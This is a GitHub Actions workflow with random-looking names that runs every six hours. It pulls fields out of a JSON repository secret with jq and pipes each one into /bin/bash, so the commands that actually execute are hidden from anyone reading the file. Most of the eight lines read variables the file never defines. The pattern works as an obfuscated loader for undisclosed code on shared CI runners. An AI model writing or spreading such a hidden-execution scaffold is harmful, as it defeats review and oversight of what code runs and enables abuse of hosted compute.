name: futuredonutt

on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: futuredonutt
        env:
          gqmpn30562: ${{ secrets.gqmpn30562 }}
        run: |
          echo $gqmpn30562 | jq -r .hxm5 | /bin/bash
          echo $hmx65 | jq -r .jpqfz047 | /bin/bash
          echo $laa8 | jq -r .b05051 | /bin/bash
          echo $x999 | jq -r .n97163 | /bin/bash
          echo $ce4951 | jq -r .bwlrw9 | /bin/bash
          echo $qcr1987 | jq -r .slf3027 | /bin/bash
          echo $ykdga60687 | jq -r .wp03 | /bin/bash
          echo $plh494 | jq -r .ho01305 | /bin/bash

